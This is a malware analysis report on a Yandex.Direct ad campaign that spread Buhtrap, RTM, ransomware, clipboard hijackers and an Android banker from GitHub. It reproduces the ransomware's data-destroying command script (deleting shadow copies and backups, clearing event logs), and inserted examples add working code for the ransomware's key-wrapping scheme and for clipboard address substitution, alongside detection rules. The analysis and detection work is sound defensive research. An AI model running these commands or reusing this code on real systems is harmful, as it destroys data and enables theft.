Buhtrap backdoor and ransomware distributed via Yandex.Direct

To single out targets for a cyberattack, you can use the documents they search for online. That is roughly what a cybercriminal group has been doing over the past few months, distributing the well-known Buhtrap and RTM backdoors, as well as ransomware and cryptocurrency-stealing software. Most of the targets are in Russia. The attack was carried out by placing malicious advertisements in Yandex.Direct. Potential victims were directed to a website where they were prompted to download a malicious file disguised as a document template. Yandex removed the malicious advertising after our notification.

The Buhtrap source code was leaked online in the past, so anyone can use it. We have no information about the availability of the RTM code.

In this post we describe how the attackers distributed malware using Yandex.Direct and hosted it on GitHub. The post concludes with a technical analysis of the malware.


Buhtrap and RTM are back in business

Distribution method and victims

The various payloads delivered to victims share the same distribution method. All malicious files created by the attackers were placed in two different GitHub repositories.

Typically, a repository contained a single malicious executable, which was replaced frequently. Since GitHub lets you view the change history of a repository, we can see which malware was distributed at any given time. To convince the victim to download the malicious file, the website blanki-shabloni24[.]ru (shown in the figure above) was used.

The site design and all malicious file names follow a single theme: forms, templates, contracts, samples, and so on. Given that the Buhtrap and RTM software had already been used in attacks on accountants in the past, we assumed that the strategy in the new campaign is the same. The only question is how the victim reached the attackers' site.

Infection

At least a few of the potential victims who ended up on this site were lured there by malicious advertising. Below is an example URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

As you can see from the link, the banner was served on the legitimate accounting forum bb.f2[.]kz. It is important to note that the banners appeared on various sites, all with the same campaign id (blanki_rsya), and most of them related to accounting or legal services. The URL shows that the potential victim used the search query "download invoice form", which supports our hypothesis of a targeted attack. Below are the sites on which the banners appeared, together with the corresponding search queries.

  • download invoice form - bb.f2[.]kz
  • contract template - Ipopen[.]ru
  • complaint application sample - 77metrov[.]ru
  • agreement form - blank-dogovor-kupli-prodazhi[.]ru
  • court petition sample - zen.yandex[.]ru
  • complaint sample - yurday[.]ru
  • contract form samples - Regforum[.]ru
  • contract form - assistentus[.]ru
  • apartment agreement sample - napravah[.]com
  • legal contract samples - avito[.]ru

The blanki-shabloni24[.]ru domain was probably set up to pass a simple visual check. Typically, an advertisement pointing to a decent-looking site with a link to GitHub does not look obviously malicious. In addition, the attackers uploaded the malicious files to the repository only for a limited time, probably for the duration of a campaign. Most of the time, the GitHub repository contained an empty zip archive or an empty EXE file. The attackers could therefore distribute advertising through Yandex.Direct on sites likely to be visited by accountants who arrived in response to specific search queries.

Next, let us look at the various payloads distributed in this way.

Payload Analysis

Distribution timeline

The malicious campaign started at the end of October 2018 and was active at the time of writing. Since the whole repository was publicly available on GitHub, we compiled an accurate timeline of the distribution of six different malware families (see the figure below). We added a line showing when the banner link was first observed, as measured by ESET telemetry, for comparison with the git history. As you can see, it correlates well with the availability of the payload on GitHub. The discrepancy at the end of February is explained by the fact that we did not have part of the change history, because the repository was removed from GitHub before we could retrieve it in full.

Figure 1. Malware distribution timeline.

Code-Signing Certificates

The campaign used several certificates. Some of them signed more than one malware family, which further indicates that the different samples belong to the same campaign. Despite possessing the private key, the operators did not sign their binaries systematically and did not use the key for all samples. At the end of February 2019, the attackers started producing invalid signatures using a Google certificate for which they did not have the private key.

All certificates involved in the campaign, and the malware families they signed, are listed in the table below.

[Table: code-signing certificates and the malware families they signed; not reproduced in this copy]

We also used these code-signing certificates to establish links with other malware families. For most of the certificates, we found no samples that had not been distributed through the GitHub repository. However, the TOV "MARIYA" certificate was used to sign malware belonging to the Wauchos botnet, adware and miners. It is unlikely that this malware is related to this campaign. Most likely, the certificate was bought on the darknet.

Win32/Filecoder.Buhtrap

The first component that caught our attention was the newly discovered Win32/Filecoder.Buhtrap. It is a Delphi binary that is sometimes packed. It was distributed mostly in February and March 2019. It behaves as one would expect from ransomware: it searches local drives and network shares and encrypts the files it finds. It does not need an internet connection to do damage, because it does not contact a server to send the encryption keys. Instead, it appends a "token" to the end of the ransom note and suggests using email or Bitmessage to contact the operators.

To encrypt as many sensitive resources as possible, Filecoder.Buhtrap runs a thread designed to terminate key software that may hold open file handles on files containing valuable information, which would otherwise interfere with encryption. The targeted processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap deletes log files and backups to make data recovery harder. To do so it uses the batch script below: bcdedit turns off Windows recovery, wbadmin, wmic and vssadmin delete backups and Volume Shadow Copies, the reg, attrib and del commands wipe the RDP connection history, and wevtutil clears the event logs before sc stops the Event Log service from starting again.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib "%userprofile%\documents\Default.rdp" -s -h
del "%userprofile%\documents\Default.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
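Every command in that script is a well-known pre-encryption signal, and they arrive within seconds of each other from the same parent cmd.exe. The following detection logic, added here as an example and not part of ESET's analysis or the malware, matches process-creation records against those commands and alerts only when one host shows two or more of the techniques together, so a lone backup-cleanup job does not fire. The log records are constructed to resemble Sysmon Event ID 1 / Security 4688 fields; the field names are an assumption, not any product's schema.

```python
"""Detection logic for the recovery-inhibition batch script above.

Added example, not ESET's or the malware author's code. Log records are
constructed; field names (Computer, ParentImage, CommandLine) are assumed.
"""
from __future__ import annotations

import re

# (rule name, MITRE ATT&CK technique, pattern over the process command line)
RULES = [
    ("bcdedit_disable_recovery", "T1490",
     re.compile(r"\bbcdedit(\.exe)?\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("wbadmin_delete_backups", "T1490",
     re.compile(r"\bwbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup|backup)\b", re.I)),
    ("shadow_copy_deletion", "T1490",
     re.compile(r"\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)\b", re.I)),
    ("event_log_cleared", "T1070.001",
     re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\s+(application|security|system)\b", re.I)),
    ("eventlog_service_disabled", "T1562.002",
     re.compile(r"\bsc(\.exe)?\s+config\s+eventlog\s+start\s*=\s*disabled\b", re.I)),
    ("rdp_history_wiped", "T1070",
     re.compile(r"\breg(\.exe)?\s+delete\s+\"?HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client", re.I)),
]


def match_command_line(cmd: str) -> list[tuple[str, str]]:
    """Return the (rule, technique) pairs that fire on one process command line."""
    return [(name, tech) for name, tech, rx in RULES if rx.search(cmd)]


def scan(events: list[dict]) -> dict:
    """Correlate hits per host. A host is alerted on when two or more distinct
    techniques appear, which is the shape of this script rather than of an
    administrator running a single maintenance command."""
    per_host: dict[str, dict] = {}
    for ev in events:
        hits = match_command_line(ev["CommandLine"])
        if not hits:
            continue
        h = per_host.setdefault(ev["Computer"], {"rules": set(), "techniques": set(), "parents": set()})
        h["rules"].update(r for r, _ in hits)
        h["techniques"].update(t for _, t in hits)
        h["parents"].add(ev["ParentImage"])
    return {
        host: {"alert": len(v["techniques"]) >= 2, **{k: sorted(s) for k, s in v.items()}}
        for host, v in per_host.items()
    }


CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation records: one infected workstation, one admin, one backup host.
SAMPLE_EVENTS = [
    {"Computer": "ACC-PC01", "ParentImage": CMD, "CommandLine": "bcdedit /set {default} recoveryenabled no"},
    {"Computer": "ACC-PC01", "ParentImage": CMD, "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"Computer": "ACC-PC01", "ParentImage": CMD, "CommandLine": "wevtutil.exe clear-log Security"},
    {"Computer": "ACC-PC01", "ParentImage": CMD, "CommandLine": "sc config eventlog start=disabled"},
    {"Computer": "ACC-PC01", "ParentImage": CMD,
     "CommandLine": r'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f'},
    # benign: listing and querying, not deleting
    {"Computer": "IT-ADMIN", "ParentImage": PS, "CommandLine": "vssadmin list shadows"},
    {"Computer": "IT-ADMIN", "ParentImage": PS, "CommandLine": "wevtutil qe Application /c:5"},
    # a single backup-cleanup command: one rule fires, but no multi-technique alert
    {"Computer": "BACKUP01", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "wbadmin delete catalog -quiet"},
]

if __name__ == "__main__":
    for host, verdict in scan(SAMPLE_EVENTS).items():
        print(host, verdict)
```

The two-technique threshold is deliberate: `vssadmin delete shadows` alone is common in backup tooling, but combined with `wevtutil clear-log` or `sc config eventlog start=disabled` it is hard to explain as maintenance. Because the script also disables the Event Log service as its last step, the alert must be driven from forwarded process-creation telemetry (Sysmon, EDR), not from the host's local event logs alone.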

Filecoder.Buhtrap uses the legitimate IP Logger web service, which is designed to collect information about website visitors. Here it is used to track ransomware victims, via the following command line:

mshta.exe "javascript:document.write('');"

Files are selected for encryption if they do not match three exclusion lists. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Second, all files whose full path contains one of the strings in the list below are excluded.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
google\chrome
google
boot
application data
apple computer\safari
appdata
all users
:\windows
:\system volume information
:\nvidia
:\intel

Third, certain file names are also excluded from encryption, among them the name of the ransom note file. The list is given below. All of these exclusions are evidently meant to keep the machine bootable, but with minimal usability.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

File encryption scheme

Once executed, the malware generates a 512-bit RSA key pair. The private exponent (d) and modulus (n) are then encrypted with a hard-coded 2048-bit public key (public exponent and modulus), zlib-compressed and base64-encoded. The code responsible for this is shown in Figure 2.

Figure 2. Hex-Rays decompiler output of the 512-bit RSA key generation routine.

Below is an example of the plaintext containing a generated private key; encrypted and encoded, it becomes the token appended to the ransom note.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

The attackers' public key is given below.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = [modulus value not reproduced in this copy]

Files are encrypted with AES-128-CBC using a 256-bit key (as stated in the analysis; a 256-bit key implies AES-256, so one of the two figures is probably a slip). For every file encrypted, a new key and a new initialization vector are generated. The key information is appended to the end of the encrypted file. Let us look at the encrypted file format.
Encrypted files have the following header:

[Figure: encrypted file header layout; not reproduced in this copy]

The original file data, prefixed with the magic value VEGA, is encrypted only up to the first 0x5000 bytes. All of the information needed for decryption is appended to the file with the following structure:

[Figure: encrypted file trailer layout; not reproduced in this copy]

- The file size flag indicates whether the file is larger than 0x5000 bytes
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hard-coded RSA public key))
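The two-level wrapping above is what lets the ransomware work offline: the victim's private key never leaves the machine except inside a blob only the operators can open. The following model, added here as an example and not the malware's or ESET's code, reproduces that key hierarchy end to end with standard-library code only. Assumptions not stated on the page: raw (unpadded) textbook RSA, 64-byte big-endian fields for d and n, little detail beyond the structure for the blobs, and a freshly generated 2048-bit key standing in for the operators' hard-coded one. The AES-CBC encryption of the first 0x5000 bytes is not reproduced; only the key handling is.

```python
"""Model of the Filecoder.Buhtrap key hierarchy described above.

Added example, not the malware's or ESET's code. Assumptions: textbook RSA
without padding, 64-byte fields for d and n, a generated stand-in for the
operators' 2048-bit key. File body encryption is out of scope here.
"""
import base64
import os
import random
import zlib

_rng = random.SystemRandom()

KEY_BYTES = 64      # 512-bit victim key: d and n are 64 bytes each, 128 in total
CHUNK = 0x5000      # only the first 0x5000 bytes of a file are encrypted
MAGIC = b"VEGA"     # marker prepended to the file data before encryption


def _is_probable_prime(n: int, rounds: int = 16) -> bool:
    """Miller-Rabin after a few trial divisions."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(_rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _gen_prime(bits: int) -> int:
    while True:
        cand = _rng.getrandbits(bits) | (1 << (bits - 1)) | 1   # exact bit length, odd
        if _is_probable_prime(cand):
            return cand


def rsa_keygen(bits: int, e: int = 65537):
    """Textbook RSA key generation: returns (n, e, d)."""
    while True:
        p, q = _gen_prime(bits // 2), _gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return p * q, e, pow(e, -1, phi)


def make_victim_token(operator_pub):
    """Infection side, once: generate the 512-bit key and the ransom-note token."""
    op_n, op_e = operator_pub
    n, e, d = rsa_keygen(512)
    secret = d.to_bytes(KEY_BYTES, "big") + n.to_bytes(KEY_BYTES, "big")   # the 128-byte plaintext
    wrapped = pow(int.from_bytes(secret, "big"), op_e, op_n)               # RSA key blob before zlib
    blob = wrapped.to_bytes((op_n.bit_length() + 7) // 8, "big")
    return (n, e), base64.b64encode(zlib.compress(blob)).decode()


def wrap_file_key(victim_pub, data: bytes):
    """Infection side, per file: fresh AES key and IV, wrapped with the victim public key.
    Returns the key material and the trailer fields the encrypted file carries."""
    n, e = victim_pub
    aes_key, iv = os.urandom(32), os.urandom(16)
    blob = pow(int.from_bytes(aes_key + iv, "big"), e, n).to_bytes(KEY_BYTES, "big")
    return aes_key, iv, {"large_file": len(data) > CHUNK, "aes_key_blob": zlib.compress(blob)}


def recover_victim_key(operator_priv, token: str):
    """Operator side: the token alone yields the victim's private key (n, d)."""
    op_n, op_d = operator_priv
    wrapped = int.from_bytes(zlib.decompress(base64.b64decode(token)), "big")
    secret = pow(wrapped, op_d, op_n).to_bytes(2 * KEY_BYTES, "big")
    return int.from_bytes(secret[KEY_BYTES:], "big"), int.from_bytes(secret[:KEY_BYTES], "big")


def unwrap_file_key(victim_priv, trailer):
    n, d = victim_priv
    blob = int.from_bytes(zlib.decompress(trailer["aes_key_blob"]), "big")
    plain = pow(blob, d, n).to_bytes(48, "big")
    return plain[:32], plain[32:]


def demo():
    """End to end: infection, then decryption with nothing but the token and the operator key."""
    op_n, op_e, op_d = rsa_keygen(2048)                 # stand-in for the hard-coded operator key
    victim_pub, token = make_victim_token((op_n, op_e))
    sample = b"constructed invoice data " * 2000        # 50,000 bytes, larger than CHUNK
    aes_key, iv, trailer = wrap_file_key(victim_pub, MAGIC + sample)
    victim_priv = recover_victim_key((op_n, op_d), token)
    return {
        "token_len": len(token),
        "large_file": trailer["large_file"],
        "victim_n_bits": victim_pub[0].bit_length(),
        "keys_match": unwrap_file_key(victim_priv, trailer) == (aes_key, iv),
    }


if __name__ == "__main__":
    print(demo())
```

Two things fall out of running this. The victim only ever holds (n, e) in the clear, so every per-file AES key is locked behind the token, and the token is locked behind the operators' private key; that is why no C&C is needed. And while a 512-bit RSA modulus is within reach of factoring today, that only helps a responder who can find the victim's n on the machine or in memory; in this model it is present in the clear only while the sample runs.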

Win32/ClipBanker

Win32/ClipBanker is a component that was distributed intermittently from late October to early December 2018. Its role is to monitor the contents of the clipboard, looking for cryptocurrency wallet addresses. Once it identifies a target wallet address, ClipBanker replaces it with an address believed to belong to the operators. The samples we examined were neither packed nor obfuscated. The only mechanism used to hide its behaviour is string encryption. The operators' wallet addresses are encrypted with RC4. The targeted cryptocurrencies are Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.

During the period in which the malware was being spread, only a small amount of BTC was sent to the attackers' Bitcoin wallets, which casts doubt on the success of the campaign. Moreover, there is no evidence that these transactions were related to ClipBanker at all.

Win32/RTM

The Win32/RTM component was distributed for a few days in early March 2019. RTM is a banking Trojan written in Delphi that targets remote banking systems. In 2017, ESET researchers published a detailed analysis of this program, and that description is still relevant. In January 2019, Palo Alto Networks also released a blog post about RTM.

Buhtrap Loader

For a while, a loader that differed from the earlier Buhtrap tools was available on GitHub. It contacts https://94.100.18[.]67/RSS.php?<some_id> to fetch the next stage and loads it directly into memory. We can distinguish two behaviours of the second-stage code. For the first URL, RSS.php handed out the Buhtrap backdoor directly; this backdoor is very similar to the one that has been available since the source code leak.

Interestingly, we see several campaigns using the Buhtrap backdoor, reportedly run by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual scheme with the DLL deployment process that we discussed earlier. In addition, the operators changed the RC4 key used to encrypt network traffic to the C&C server. In most of the campaigns we have seen, the operators did not bother to change this key.

The second, more complex behaviour was that the RSS.php URL handed out another loader. It implemented some obfuscation, such as rebuilding the dynamic import table. The purpose of this loader is to contact the C&C server msiofficeupd[.]com/api/F27F84EDA4D13B15/2, send logs and wait for a response. It treats the response as a blob, loads it into memory and executes it. The payload we saw executed by this loader was the same Buhtrap backdoor, but there may be other components.

Android/Spy.Banker

Interestingly, an Android component was also found in the GitHub repository. It was in the master branch for only one day, November 1, 2018. Apart from its being posted on GitHub, ESET telemetry shows no evidence of this malware being distributed.

The component is packaged as an Android Application Package (APK). It is heavily obfuscated. The malicious behaviour is hidden in an encrypted JAR contained in the APK. It is encrypted with RC4 using the following key:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

The same key and algorithm are used to encrypt strings. The JAR is located at APK_ROOT + image/files. The first 4 bytes of the file hold the length of the encrypted JAR, which begins immediately after the length field.
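Recovering that JAR needs nothing more than the key above and the 4-byte length prefix. The script below, added here as an example and not the malware's or ESET's code, implements RC4 in full, parses the length-prefixed asset, and validates the result by checking for the zip magic and listing the entries. Assumptions: the length field is little-endian (the page does not say), and the input asset is constructed here by encrypting a small zip built with the standard library, since the real file is not reproduced.

```python
"""Unpacking the RC4-encrypted JAR from the Android/Spy.Banker APK.

Added example, not the malware's or ESET's code. Assumes a little-endian
length field; the sample asset is constructed in build_fake_asset().
"""
import io
import zipfile

# The 37-byte RC4 key listed in the analysis.
KEY = bytes([
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96,
])


def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4 (KSA then PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def extract_jar(asset: bytes) -> bytes:
    """Parse '<u32 length><RC4(JAR)>' and return the decrypted JAR, validating the zip magic."""
    if len(asset) < 4:
        raise ValueError("asset shorter than the 4-byte length field")
    length = int.from_bytes(asset[:4], "little")
    body = asset[4:4 + length]
    if len(body) != length:
        raise ValueError(f"truncated asset: header says {length} bytes, {len(body)} present")
    jar = rc4(KEY, body)
    if jar[:4] != b"PK\x03\x04":
        raise ValueError("decrypted data is not a zip: wrong key, or wrong length byte order")
    return jar


def jar_entries(jar: bytes) -> list:
    return zipfile.ZipFile(io.BytesIO(jar)).namelist()


def decrypt_string(blob: bytes) -> str:
    """Strings in the APK use the same key and algorithm as the JAR."""
    return rc4(KEY, blob).decode("utf-8")


def build_fake_asset() -> bytes:
    """Constructed fixture: a two-entry zip, RC4-encrypted and length-prefixed, with trailing padding."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", b"dex\n035\x00" + bytes(32))   # placeholder bytes, not a real dex
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    jar = buf.getvalue()
    return len(jar).to_bytes(4, "little") + rc4(KEY, jar) + b"\xaa" * 8


if __name__ == "__main__":
    print(jar_entries(extract_jar(build_fake_asset())))
```

If the magic check fails on a real sample, try the big-endian reading of the length field before suspecting the key: RC4 has no integrity check of its own, so a wrong offset silently yields garbage rather than an error.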

After decrypting the file, we found that it was Anubis, a previously documented Android banker. The malware has the following features:

  • microphone recording
  • taking screenshots
  • obtaining GPS coordinates
  • keylogger
  • encrypting device data and demanding a ransom
  • sending spam

Interestingly, the banker used Twitter as a backup communication channel for obtaining another C&C server. The sample we analysed used the @JonesTrader account, but by the time of the analysis it had already been blocked.

The banker contains a list of target applications on the Android device. It is longer than the list obtained in the Sophos study. The list includes many banking applications, online shopping applications such as Amazon and eBay, and cryptocurrency services.

MSIL/ClipBanker.IH

The last component distributed as part of this campaign was a .NET Windows executable that appeared in March 2019. Most of the versions we studied were packed with ConfuserEx v1.0.0. Like ClipBanker, this component abuses the clipboard. It targets a wide range of cryptocurrencies, as well as Steam trade offers. In addition, it uses the IP Logger service to steal private Bitcoin keys in WIF format.

Protection mechanisms

Besides the protection ConfuserEx provides against debugging, dumping and tampering, the component includes the ability to detect antivirus products and virtual machines.

To check whether it is running in a virtual machine, the malware uses the built-in Windows WMI command-line tool (WMIC) to query BIOS information, namely:

wmic bios

The program then parses the output of the command and looks for the keywords VBOX, VirtualBox, XEN, qemu, bochs and VM.

To detect antivirus products, the malware sends a Windows Management Instrumentation (WMI) query to the Windows Security Center using the ManagementObjectSearcher API, as shown below. After decoding from base64, the call looks like this:

ManagementObjectSearcher('root\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

Figure 3. Antivirus product detection routine.

In addition, the malware checks whether CryptoClipWatcher, a tool for protecting against clipboard hijacking, is running and, if so, suspends all threads in that process, thereby disabling the protection.

Persistence

The version of the malware we studied copies itself to %APPDATA%\google\updater.exe and sets the "hidden" attribute on the google directory. It then modifies the value Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell in the Windows registry, adding the path to updater.exe. In this way the malware is executed every time the user logs in.

Malicious behaviour

Like ClipBanker, the malware monitors the contents of the clipboard and looks for cryptocurrency wallet addresses; when it finds one, it replaces it with one of the operators' addresses. Below is the list of targeted address types, based on what is found in the code.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

Each address type has a corresponding regular expression. The STEAM_URL value is used to attack the Steam trading system, as can be seen from the regular expression used to recognise it in the clipboard buffer:

\b(https://|http://|)steamcommunity.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b
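Seeing the substitution run against real clipboard text makes the threat model concrete, including why suspending CryptoClipWatcher matters. The script below is added here as an example and is not the malware's or ESET's code. STEAM_URL is the expression above with its backslashes restored; the three BTC patterns are this example's own approximations of the P2PKH, P2SH and Bech32 address shapes, not the malware's patterns. The operator addresses and clipboard contents are constructed placeholders, and the guard's design is assumed (the page only names CryptoClipWatcher, not how it works).

```python
"""Clipboard substitution as MSIL/ClipBanker.IH performs it, and a guard check against it.

Added example, not the malware's or ESET's code. Only STEAM_URL is the
pattern from the analysis; the BTC patterns, addresses and texts are constructed.
"""
import re

PATTERNS = {
    "STEAM_URL": re.compile(
        r"\b(https://|http://|)steamcommunity.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b"),
    "BTC_P2PKH": re.compile(r"\b1[a-km-zA-HJ-NP-Z1-9]{25,34}\b"),   # approximation, not the malware's
    "BTC_P2SH": re.compile(r"\b3[a-km-zA-HJ-NP-Z1-9]{25,34}\b"),    # approximation, not the malware's
    "BTC_BECH32": re.compile(r"\bbc1[ac-hj-np-z02-9]{11,71}\b"),     # approximation, not the malware's
}

# Constructed stand-ins for the attacker-controlled replacement values.
OPERATOR = {
    "STEAM_URL": "https://steamcommunity.com/tradeoffer/new/?partner=999999999&token=zzzzzzzz",
    "BTC_P2PKH": "1AttackerExampAddrzzzzzzzzzzzzzzzz",
    "BTC_P2SH": "3AttackerExampAddrzzzzzzzzzzzzzzzz",
    "BTC_BECH32": "bc1qattackerexampaddrzzzzzzzzzzzzzzzzzzzzz",
}


def substitute(clipboard: str):
    """What the malware does on every clipboard change: rewrite each recognised value.
    Returns the new clipboard text and the kinds that were swapped."""
    swapped = []
    for kind, rx in PATTERNS.items():
        clipboard, count = rx.subn(OPERATOR[kind], clipboard)
        if count:
            swapped.append(kind)
    return clipboard, swapped


def guard_check(user_copied: str, clipboard_now: str) -> dict:
    """A clipboard guard's check at paste time (assumed design): the only legitimate
    content is what the user actually copied; anything else that looks like a
    payment target is a swap. This is the kind of check the malware neutralises
    by suspending the guard's threads."""
    if clipboard_now == user_copied:
        return {"tampered": False, "kinds": []}
    kinds = [k for k, rx in PATTERNS.items() if rx.search(clipboard_now)]
    return {"tampered": bool(kinds), "kinds": kinds}


# Constructed clipboard contents.
VICTIM_NOTE = ("Pay 0.1 BTC to 1VictimExampAddrzzzzzzzzzzzzzzzzzz or "
               "bc1qvctmexampaddrzzzzzzzzzzzzzzzzzzzzzzzzz by Friday")
TRADE_OFFER = "https://steamcommunity.com/tradeoffer/new/?partner=123456789&token=AbCdEfGh"

if __name__ == "__main__":
    for text in (VICTIM_NOTE, TRADE_OFFER, "no addresses here"):
        swapped_text, kinds = substitute(text)
        print(kinds, guard_check(text, swapped_text))
```

The guard can only work if it runs where the malware cannot suspend it, or if the comparison happens at paste time inside the receiving application; a watcher running as the same user in the same session is exactly what this sample is built to switch off.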

Exfiltration channel

In addition to replacing addresses in the clipboard, the malware targets the WIF private keys of Bitcoin, Bitcoin Core and Electrum Bitcoin wallets. The program uses iplogger.org as the exfiltration channel for the stolen WIF private key. To do so, the operators place the private key data in the HTTP User-Agent header, as shown below.

Figure 4. IP Logger console with exfiltrated data.

The operators did not use iplogger.org to exfiltrate wallet files. They probably used a different method because of the 255-character limit on the User-Agent field shown in the IP Logger web interface. In the samples we studied, the other exfiltration server was stored in the environment variable DiscordWebHook. Surprisingly, this environment variable is not set anywhere in the code. This suggests that the malware is still under development and that the variable was set on the operator's test machine.

There is another sign that the program is under development. The binary includes two iplogger.org URLs, and both are queried when data is exfiltrated. In the request to one of these URLs, the value of the Referer field is prefixed with "DEV /". We also found a version that had not been packed with ConfuserEx, in which the variable holding this URL is named DevFeedbackUrl. Based on that variable name, we believe the operators plan to use the legitimate Discord service and its webhook system to steal crypto wallets.

Conclusion

This campaign is an example of legitimate advertising services being used in cyberattacks. The scheme targeted Russian organisations, but we would not be surprised to see a similar attack using non-Russian services. To avoid compromise, users should be confident of the reputation of the source of the software they download.

The full list of indicators of compromise and MITRE ATT&CK techniques is available at the link.

Source: www.habr.com
